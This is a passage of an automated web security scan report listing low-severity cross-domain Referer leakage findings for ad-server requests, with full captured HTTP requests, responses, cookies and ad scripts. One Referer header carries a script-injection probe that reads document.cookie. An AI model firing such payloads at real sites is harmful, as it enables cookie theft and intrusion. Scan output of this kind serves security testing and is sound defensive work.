User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 14:28:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 31836

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
m1%3D0%3B_dc_redir%3Durl%3fhttp://ad.doubleclick.net/click%3Bh%3Dv8/3a9e/3/0/%2a/q%3B234996344%3B0-0%3B0%3B36776785%3B4307-300/250%3B40166379/40184165/1%3B%3B%7Esscs%3D%3fhttp://www.turningstone.com/"><IMG SRC="http://s0.2mdn.net/2418884/PID_1510902_turningstone.jpg" width="300" height="250" BORDER=0 alt=""></A>
...[SNIP]...

17.82. http://ad.doubleclick.net/adj/fbi.wrgb.cbs6albany/weather

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/fbi.wrgb.cbs6albany/weather

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain (see the captured request and response below). When the browser fetches that resource or the user follows the link, the page URL, query string included, is sent to that domain in the Referer header.

Request

GET /adj/fbi.wrgb.cbs6albany/weather;s1=weather;pos=1;dcode=fbi;pcode=wrgb;kw=;ref=?burp;test=;fci=ad;dcopt=;tile=1;sz=728x90;ord=9032834577374160? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/albany-weather-forecast?dec0c'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E262a2c2a00e=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sat, 29 Jan 2011 13:38:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 302

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a9e/0/0/%2a/q;234748582;0-0;0;36777459;3454-728/90;40139686/40157473/1;;~sscs=%3fhttp://www.turningstone.com/"><img src="http://s0.2mdn.net/viewad/2418884/WRGB728x90.jpg" border=0 alt="Click here to find out more!"></a>
...[SNIP]...

17.83. http://ad.doubleclick.net/adj/iblocal.revinet.bostonherald/audience

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/iblocal.revinet.bostonherald/audience

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain (see the captured request and response below). When the browser fetches that resource or the user follows the link, the page URL, query string included, is sent to that domain in the Referer header.

Request

GET /adj/iblocal.revinet.bostonherald/audience;net=iblocal;u=,iblocal-90228043_1296254385,11d765b6a10b1b3,ent,ex.32-ex.76-bk.rdst1-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m;;sz=728x90;net=iblocal;env=ifr;ord1=322199;contx=ent;dc=w;btg=ex.32;btg=ex.76;btg=bk.rdst1;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_l;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_m;ord=0.8110197517089546? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9||t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Fri, 28 Jan 2011 22:39:45 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 838

document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3a9d/0/0/%2a/h;234129315;1-0;0;57964437;3454-728/90;39960420/39978207/1;u=,iblocal-90228043_1296254385,11d765b6a10b1b3,ent,e
...[SNIP]...
an-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_l-cm.sports_h-cm.weath_l-cm.ent_m;~aopt=2/0/ff/0;~sscs=%3fhttps://osc.hscil.com/tx/Quoting/BCBSQuickQuoteB.aspx?source=TXC3064320&WT.mc_id=TXC3064320"><img src="http://s0.2mdn.net/viewad/2915957/2-90355.1010_728x903_tx.jpg" border=0 alt="Advertisement"></a>
...[SNIP]...

17.84. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain (see the captured request and response below). When the browser fetches that resource or the user follows the link, the page URL, query string included, is sent to that domain in the Referer header.

Request

GET /server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=25206694&ahcid=78205&bimpd=21muvIbp10pUTWpgKeYXuBQpi4lGWgXGmwtEktp0bnhlzcEPCmKdzaOiN1w1JuG39EwjnwLbuWY9jCkZnpaQCWMdTXpPOHIA4Z3jWxQxlq4y0vr517NqPsPUS5E3qaEy91D0_KKhuTQf67OuV_F749IlnflTkyMzHOFj90yiivHk_Cifb2ytW8v8q_Ju-6U92ggx_bSQJBFgf_df8ZyZOeIlwU6iDh8JI6jOqp9q_Wu3L84a7I2NobirdMafsG3a4N_1k_LcbI1l_qw0hEgsW7ih2yQWaHy9ifTWvGQp8MHeKeZbcKBEFJ-wvfKan3_Boe6iWHbggg0Ypr7Atghsve1apqwxaDzB0mbr6PDH01f6uHcLMkCy-9027k5Tm6h9eWjcOJtBxwrIpab7eQoB2_vtezeQUtzKlS-ZQl0TjFHJLs4Ovk7WWqSFZMBZz0bEQl2pohKvINvcsARm5gxTHdmyu_XeZQTM0Y5XRGWekIB53lXvcwhi6qGeInxFIoFRfkbJ9D6YlCf5v80FPzVo5ZXIC94vkRX48casGySCH6SZxmuGhwjIl1JUdlPvihaCvfBz5xDsVEqchMpjM7fNhfDYOPZ0JXZ2uZFvjyYJf-F96K7oroatdbmzLY4GaezlgHULOjMY_qhRxKBMycAthKXuC9_2QhUUPMZBRYynaNwC3_JOWKiVz48eoEJe8dgOqRCcEuBcKxtaNJfsYHiQ1JAURjFg_cZiTZL5pFw8O7mjsZQyAQ6kVAwWSib4A4xDzHGAvnK92wWrpVqHjkZPWuoljc-5zAAoOxoBcBgje0LDTAGcK0LbrjjUGkdS7-oV&acp=35600B7D7485C869&rtbacid=55ed4e5e03bf8e5477cfcd0039923902d2e38a03 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment&trackstats=no
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=mBKzL7e3U8ZGre9WC0H4T5Vy7uT76lZYzTAgX1gI0Tupk3fkjDz-oFhodnllmRd81JMY8RXkGx2Pc818psEgN9Lncbxtk4Vq8cIvvle9PRkgcpfbxz6dRvMtAlAkb0mwzqgd6N6CeKh7LtEeNzMSlNLj3qKj0eUvArPFwciatYahKApfnHgOrARRJJ1Q3WZo2JA-MlzxWqdsCzmlros8v7W-LJybjP5rW8OfIeSWiq6Wxd8iDkpRBgczeuDBRfZY; fc=Zko6SdFUw8hMDAXvlj3m9AVsgCSj563yW4r5J3bT9GFRvy6-tKeSzr3CZDTMcZ6xpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3dri3Sy-PEwXW67DoFr3mtCG; pf=fQr-Lp4pHEigOJn-iFvF6EHhsPKnqdSwqPbqqqZxyu2JwV9kSIzX4BtZ7vBDkFqioGYOK1EVEknK4zK8JJHnRX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Mon, 31 Jan 2011 01:55:06 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Thu, 28-Jul-2011 01:55:06 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:55:06 GMT
Content-Length: 8925


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
{return document.all[id];};}var getQueryParamValue=deconcept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


document.write('\n\n\n    \n\n     \n        \n                        <A HREF="http://www.unicefusa.org/?utm_source=turn&utm_medium=display_ad&utm_campaign=haiti365&utm_content=728x90" target="_blank">\n<IMG SRC="http://img.turn.com/img-data/haiti-1year-728x90.jpg" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement">
...[SNIP]...

17.85. http://ad.turn.com/server/ads.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/ads.js

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains (see the captured request and response below). When the browser fetches those resources or the user follows the links, the page URL, query string included, is sent to each of those domains in the Referer header.

Request

GET /server/ads.js?&pub=6264177&code=14383608&cch=14381728&l=728x90&tmz=-6&area=0&res=1920&rnd=0.4859149551484734&url=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&3c=http%3A%2F%2Fmedia.fastclick.net%2Fw%2Fclick.here%3Fcid%3D279888%26mid%3D522199%26m%3D1%26sid%3D54393%26c%3D0%26tp%3D5%26forced_click%3D&loc=http%3A%2F%2Fwww.bostonherald.com%2Fincludes%2FprocessAds.bg%3Fposition%3DBottom%26companion%3DTop%2CMiddle%2CMiddle1%2CBottom%26page%3Dbh.heraldinteractive.com%252Ftrack%252Fhome HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=a23_XVoqSlKtCC-2lTx1mK8Atn0oO5LfCaNOF46MJQVh-L3XcPmT4hHXOQgApIlYCBsZxoRT6EzfAaBOxC9wKT4Z56e4E96NaNZjC_AOT217oTThsnNqViHEtNUDKqf-OEq2AfRSlzTnZwWXTHks0QZw0eRZgpytzjhC6uPoirk_GMdu-y1E9O4PMUo2v2JwhEaBrxFtkyt_nkQhj928o37eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJw1Kd0O3adRO10CesNfjCJaQrupC4PpJl2uCWF8C-Ug5JonU1AejF4MphQeZeUYshY_OeXGaHeEWZpxqUmyoO4ex_oV54IeDig5WzYLup3TcrrvyCQus6kPDo2a6SDFY3VUvCEsZdhQvkMaGDNXRUK74rP1CqKPcaX2koNpmFe4031p3A6UMJjebe8drcGsyS4Zsrl5itefLEEgtwe41cGh3HscxZqdV3tAgaup_BUiqfohDo4-tul6_WuD8j0eMjBk0vy7k2KCP9mAU3yIXJQsGDwUqNo5bwBfJavyMoCpX2Mtj8-j4P85vtqL-bgk4Jg88QTsvGp_uMnqAhaiuvUqwwwjl5KiXaen7PpuSxadNSx5tYcmc04sL2FZMw7u1ZPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6ZETO-MbYZA0ULyuOeS61QiyzaIjIkAm2O1xn3y2FwP0uPWnCg7Sts-m8PiyghybB3-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lA11f5HvjRM9LIAbnXs0Li7sXDmro6MsrnR0NjzyjJ0TpQgutzeDGCBRPRExuEdlCI6QrupC4PpJl2uCWF8C-Ug4Qr4-ZP_IMKsn4iIvW22r5067axWP77CNDdpZKPWLlS6EqzrlzsjMft3cRcjGnFvlTek5Lj_h7B1Bewly4iRmuVUvCEsZdhQvkMaGDNXRUK1IwqsroZj1oRmZCrinK3xPqzZ3gkHjNDLavV-i2IDmnytv5VAjvqHzGGgVc9TLFt3n4e5tgg6Ff1RgMWUU5h-ufohDo4-tul6_WuD8j0eMjcK-jZlyP6xG2V_Rmz3l2ScGDwUqNo5bwBfJavyMoCpUNbeNuKs3BuRiO6omJfcAAyR5nk0A4EbdYMkjxQX8Hhqwwwjl5KiXaen7PpuSxadOt4qBzD-0ra0lWqOClC2AdPveIf8j2XY661VgXz9vKr9po5kaVd3TDYjljHCv4vLrze8F97qvYfrL-2a4LxLlnvjmctIv6W_2bTZNXeWSbh689PoZZTdQXeDWLQpeFTD3-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukPU0BHKzioTSvOcuG_kdCGnpgcqiBETfVCgh6rOLqPGrWJcu-kcMstt6LYwLOO39vXw6eBg1etFWMwt9pDo4G3TjkMSE2urA6RQdUAWYeoJQpCu6kLg-kmXa4JYXwL5SDjce5WjiPia_4luRal1kY0Ua2L50HxvswuEv77HCRTvK41JwlocRM-1StCCQK60MTBqLSIeNNGU_XCDdEOyfgVlVS8ISxl2FC-QxoYM1dFQrVqtvVzrvJEYFzSRak7dnImakJ6Zxx4MaHG4qowJX52fHOfatzSZzKUl8ueBqzCaawyxPIuWXsEQ-0VWpUhNmBZ-iEOjj626Xr9a4PyPR4yPdkp0kF32F0VrZ-eD50kGIwYPBSo2jlvAF8lq_IygKlXvQQfU6ZavOfoVVJhgWQDUVQfWr6jEufoVuLrgwy8D2rDDCOXkqJdp6fs-m5LFp079CPUiQuMHA6LAYXd57kxI-94h_yPZdjrrVWBfP28qvnT-zGB9Xm2VMe1fLfEIlOjW7jR21XdBj9GT7hPGQI4m-OZy0i_pb_ZtNk1d5ZJuHZA0jg1fLTpYL91q-pX0OtP78DoTX-MltELREBCeeahn1EC3U97yx8tXGz59qa
jUNpeot5-RPYUMY1qY3KivegYnicFnxFc-4ikme6wD3XHzXEqzQphnl7VhTGqxMDJsQpCu6kLg-kmXa4JYXwL5SDsgJkFWfRpPSyTdtKER-3fcbnCbJPSsHs0iOvX6zYZZ4XS3R0VP0f9ONcHVGJG5kfjUcKVDPX7zKRho6DeqmotVVS8ISxl2FC-QxoYM1dFQrENIylttcubl60fIAlgS379WGImt49pAB5RbCmhGeBVeEsNCVznntZWR3U7tjmpSZiMw4PMfLrYvwIJbxWoTsNZ-iEOjj626Xr9a4PyPR4yMyn697UAeI_iQ8xLHPyiNAwYPBSo2jlvAF8lq_IygKld75wEvezzIZgflpDl6XV7Bz61fwo7QtwGhL9V1Zrp3FrDDCOXkqJdp6fs-m5LFp0xYfxbijCuZYBnVL9kRyFz4-94h_yPZdjrrVWBfP28qvmOFU8nguKqpFLBdwoMdYmADyq9uBrjiMx6VvlWwNe_j33zBfQgc7CEV5jgCDdYtxgJ4GX4OjUVNjX2CulbPhbYCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbYbydaelxbY-p8EgzRBPnFKG8nWnpcW2PqfBIM0QT5xShvJ1p6XFtj6nwSDNEE-cUq3c3PCvX0K0pCDfAY7KB6rh-9zvu-4SLKmRwnyZzNBL4fvc77vuEiypkcJ8mczQS-H73O-77hIsqZHCfJnM0EsQJZTKOtMP9Ca7gcv2lCqRVcj84RfJT-7cTVPiV9xkT9uAa-_yMHADocL3iDyiyA1ZO48tyrM-ITAlagqmc0qyWhzPlVze60NJNLk_VPM-uFocz5Vc3utDSTS5P1TzPrhaHM-VXN7rQ0k0uT9U8z64WhzPlVze60NJNLk_VPM-uAvhIyyKReEJO7XhpyT2HyISYAbn3vt4ljb5jrj3mjbuAOwss-vu9H2Leed6bKEL9Ai4LrnYI2YdVGKStQre4vEIuC652CNmHVRikrUK3uLxAmtS2Fa_lgnITmIRLj_AJR7yJIda-hMcXPq0_ADWUTce8iSHWvoTHFz6tPwA1lE3HvIkh1r6Exxc-rT8ANZRNz1jBTPQnGgalvM6qx6aEDqwMBGNyQcik-CF3_ES7LaN4Qoi_pxuEDAGD0pSAe0ShbJ44Ix0PS_yRZLx_j2HJpKyeOCMdD0v8kWS8f49hyaSko9jTov_tduoJ79WLRX3x8Jj6CPb9QD2jcY4QbTolZhp6t2QqCDEnVfKSI9Czqb8VkfhIMtBluaWa_TlPV12CVZH4SDLQZbmlmv05T1ddglWR-Egy0GW5pZr9OU9XXYJVkfhIMtBluaWa_TlPV12CZekQLzj8BqHl0xQJeRVWsdCB_o2VuswdXqYMMGNHfG3Qgf6NlbrMHV6mDDBjR3xt0IH-jZW6zB1epgwwY0d8bdCB_o2VuswdXqYMMGNHfG3UUrgidBzdBjh8B5MmfBQqlFK4InQc3QY4fAeTJnwUKpRSuCJ0HN0GOHwHkyZ8FCqWvltIzMqv1Ia8A8-3JcNhcYY5Ax3y_aeD6ynSPnIOKXGGOQMd8v2ng-sp0j5yDilxhjkDHfL9p4PrKdI-cg4pas0VdShRmcr603-icVYa2s; fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; 
pf=P2ulGxJH0L6sP7i92CPecgAmiI2Lsig78fIY2fHGbzuJwV9kSIzX4BtZ7vBDkFqiEUMyLdhTUOk0HUHTgKulxX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; uid=3011330574290390485; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005; rds=14987%7C15001%7C14999%7C15001%7Cundefined%7C15003%7C15001%7C15001%7C15001%7C15001%7C15003%7C15003%7C14983%7C15003%7C15003; rv=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: public
Cache-Control: max-age=172800
Cache-Control: must-revalidate
Expires: Sun, 30 Jan 2011 23:04:23 GMT
Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Wed, 27-Jul-2011 23:04:23 GMT; Path=/
Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: adImpCount=jD3N2bWA3-mOnaHNbq6oGr6gUOClkrpfUMKANQ1vhXPfaqaDzVRu9ZiuBStYaftYCBsZxoRT6EzfAaBOxC9wKTt4volhK1SKMMEXrRaSQRZi9OYrtG-b0iAWL5Sg__z6Mu5dojwn5g9wbHIYb9itxx7GYSyR957eDlUpeFx78rgpegjWK4MWwom9unlgMhLXNsCCEbhAsIdsy3zCFGHpw37eq4Z01Gip7C0qED-uDRXnxqTFGB1N4YMlWXm_-MaJLf6A30j8d5gU8-mc72wOIKQrupC4PpJl2uCWF8C-Ug5zE4ga4uSsEjChAQfwWw36Y_OeXGaHeEWZpxqUmyoO4aEqzrlzsjMft3cRcjGnFvni7gawmV97meEG2o8pgUTMVUvCEsZdhQvkMaGDNXRUK841wLk2GYSRC0x3BEve4S431p3A6UMJjebe8drcGsyS5Eq2u8SK-4v0nTmoUt_kkk_bc2bQTBpOPgQ2rj-z4cSfohDo4-tul6_WuD8j0eMjE2VTyWMB9aQAFw797l12xcGDwUqNo5bwBfJavyMoCpVVDlIJowEL2ZJ7bbw_gCtmttGfpE3WazmTpUKWPgdm0Kwwwjl5KiXaen7PpuSxadNSxUp_78PaBWAnqowBUtUuPveIf8j2XY661VgXz9vKrzqd_vJWEpaVGIPem0izQ6aKPrXTIbISjLdU8fmF4gcunvuhdFJQJil2xKmTz50dp7i0E4C4fIPULOO-1bgvNyH-_A6E1_jJbRC0RAQnnmoZNIbl1VrG-a9_rw-zAW2lAwi3YZykxvivNDVu_wiJ-nzpgcqiBETfVCgh6rOLqPGrJHyerevXy89jQMS63zyiKqQrupC4PpJl2uCWF8C-Ug7zI1PJlsg4JH93UKg4p8Y5067axWP77CNDdpZKPWLlSzacm4a-crF0dpacRlQXSurFgJILRn7aDAZTiRRTDpAMVUvCEsZdhQvkMaGDNXRUKxEQUIAYpp-QbAJrP1iB52HqzZ3gkHjNDLavV-i2IDmnKA5Q2hyGLZzy7yP9IhZH9vIPUpju1It7TH_4ufsTy9mfohDo4-tul6_WuD8j0eMjgn3JqGWHn99L8yAc1t0CrMGDwUqNo5bwBfJavyMoCpW5NWAkI-bj2WEMdrQi7smJSD2PyHt-rGJGOJ3lCDBJu6wwwjl5KiXaen7PpuSxadNrWfCFeAmfYB9wvbNyX_HcPveIf8j2XY661VgXz9vKr9c4SMN31V96MWZ_Nbkosfv4Z9eHEmOCw9cZ5JxzVrlAnvuhdFJQJil2xKmTz50dpwLpSN-3LiOu9Vp7WBoDgFL-_A6E1_jJbRC0RAQnnmoZSXWXL95Hb45PXD4y2tHukLgWjDXsTUeTWd5tj4qNaDiJ4nBZ8RXPuIpJnusA91x86GC4mLEfJ2sljTHmzwZbAY_Lh2Ugi8mvJG633sZOiSP-EXc_UXFWP7mPaqhTNB2_pCu6kLg-kmXa4JYXwL5SDkn2PegxRqM5mRRNvuUuPQYa2L50HxvswuEv77HCRTvK8NG6w8lsq_gxT4zTpoxnW4XDDwtPU5vElBnBkAq9aTtVS8ISxl2FC-QxoYM1dFQrRidyFCOVEUccMTneL2wPB2akJ6Zxx4MaHG4qowJX52eEsNCVznntZWR3U7tjmpSZjO1tJ8qK8UAy-VKR7Q8r4Z-iEOjj626Xr9a4PyPR4yOY4aAiwQlqVTaDNmxm60K7wYPBSo2jlvAF8lq_IygKlaFm_ARvcAKoZH-AIv62HmLHlgdVIiUBy9FQ0RyPwh-_rDDCOXkqJdp6fs-m5LFp08ZtWn1dPsjZXR0HI6ZwQiQ-94h_yPZdjrrVWBfP28qvqcQn-qKG1Gb1Z9AhVjY5XByMOV9_koeB1I57EmsQtHqbnNLg8Qx7fq0wYdnvZy7Y32feEuljMvvhciAahuPk0P78DoTX-MltELREBCeeahnJarbE4M_xRXSdc
I4iMbNNITjgnthAiWrbbf30tKcRFHS__DAzsh0vKgYK4DlknsYsTXzTIe6cvP8Fgp6v0iG1pCu6kLg-kmXa4JYXwL5SDnCxFISzUKJrnz8NWtmYNBgbnCbJPSsHs0iOvX6zYZZ441JwlocRM-1StCCQK60MTAivtkH0XcIkoBkuY7jUSFZVS8ISxl2FC-QxoYM1dFQrFMPrYvz2Ts1Ij_XSz-xv_NWGImt49pAB5RbCmhGeBVfK2_lUCO-ofMYaBVz1MsW3qBtHiSDSYD2cppR2YtGNYJ-iEOjj626Xr9a4PyPR4yPVhnlIkVgFWAUsSjI0os5awYPBSo2jlvAF8lq_IygKlcymYwSoiOeW4YEq5c_wtcPOvPQvhLJNbC2RmtNyUVddQ_F7c57KXIm9M4O-4Hye-wueocyz5z4Zh4_TTFn-uAowvSXZHGSyvtzgTZp8tkHW1Lph5MNqkh8XeX6MytKBTrzG1aXCqxVf5nZAA7HLfYwHFS74pGVX6R7fIB4_ENcKBxUu-KRlV-ke3yAePxDXCgcVLvikZVfpHt8gHj8Q1woHFS74pGVX6R7fIB4_ENcKkJ7WkZl4NM0k2bFXusY9VItRHAs1DGSp43CQgKuilTWLURwLNQxkqeNwkICropU1i1EcCzUMZKnjcJCAq6KVNe4dObEIMtKsHRmogbr3003uHTmxCDLSrB0ZqIG699NN7h05sQgy0qwdGaiBuvfTTe4dObEIMtKsHRmogbr3002Ul8WnhGx-5A8JgMe8wN1plJfFp4RsfuQPCYDHvMDdaTzS0erQLm3C2K0qtVlbCNOT8XToW0yxZ3rNQFHzVErUUFo10m1vdQ1esR0Vej5o2VBaNdJtb3UNXrEdFXo-aNlQWjXSbW91DV6xHRV6PmjZiM7S8Ta6ZVi8L44nt5Lbx_VtNJu5mSi-Do8DnZc8Z5lgZTgyDxl-p9HfhLxfMdBCgGuqQYTxk1W2ZXZk9Fbu2FD6CgQVbZgEbhsoT18Qyzhw7W5j5_klUHK2cIyCgrVuHA0g_1_zvhzGxm5cQYKDYoCeBl-Do1FTY19grpWz4W2AngZfg6NRU2NfYK6Vs-FtgJ4GX4OjUVNjX2CulbPhbbQ6QSLK4RiJR_RkawdJ2DWG8nWnpcW2PqfBIM0QT5xSvI67q-6Y9u6ozlXnWk2Vqae3zeygEkfAxz0LdLPYjcint83soBJHwMc9C3Sz2I3IE2wSFrg3YhUxrd13SPf4zdk0py110jTFeWakVDqJkX2L9hnORGvmj8mxjNocqMdc8PVvEcs62kDyw4j4Ti-ngvD1bxHLOtpA8sOI-E4vp4Lw9W8RyzraQPLDiPhOL6eC8PVvEcs62kDyw4j4Ti-ngur7bsp5Fvhi44QSuDqR21RI-fooknOV-tsJXjS2yRhbSPn6KJJzlfrbCV40tskYW0j5-iiSc5X62wleNLbJGFtI-fooknOV-tsJXjS2yRhbPg2v6FqwK2qGH2NT2HwC2T4Nr-hasCtqhh9jU9h8Atk-Da_oWrAraoYfY1PYfALZ9KcqOJj5P-El2YxOi1A-SJzgRA1_Lhfy9FvJaW7uwAuc4EQNfy4X8vRbyWlu7sALnOBEDX8uF_L0W8lpbu7ACykgbtzLVWjLpGASKeaSS94; Domain=.turn.com; Expires=Wed, 27-Jul-2011 23:04:23 GMT; Path=/
Set-Cookie: fc=dwiJhIujIVbWqBI35CB1OVbkGHNm9MZWojpB1E5U-cOGOfbqfFQm5pwhAgorFe5OpCs1-fF4q_ECi-WQMxkK-aafXvxyVel7cEBnUzfP3drCT5fAUiA9uMZMwBt1WFOe2yqvnTRFFJZ0ii36dSFkNQ; Domain=.turn.com; Expires=Wed, 27-Jul-2011 23:04:23 GMT; Path=/
Set-Cookie: pf=DDphSjcGk-rcs3g8uiJ3tdVnoSLgvd8DzizssL9FyFKJwV9kSIzX4BtZ7vBDkFqigSFYvDNduS7kxw0buCFgeX4lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; Domain=.turn.com; Expires=Wed, 27-Jul-2011 23:04:23 GMT; Path=/
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 28 Jan 2011 23:04:23 GMT
Content-Length: 10126


var detect = navigator.userAgent.toLowerCase();

function checkIt(string) {
   return detect.indexOf(string) >= 0;
}

var naturalImages = new Array;

naturalImageOnLoad = function() {
   if (this.width
...[SNIP]...
concept.util.getRequestParameter;var FlashObject=deconcept.SWFObject;var SWFObject=deconcept.SWFObject;


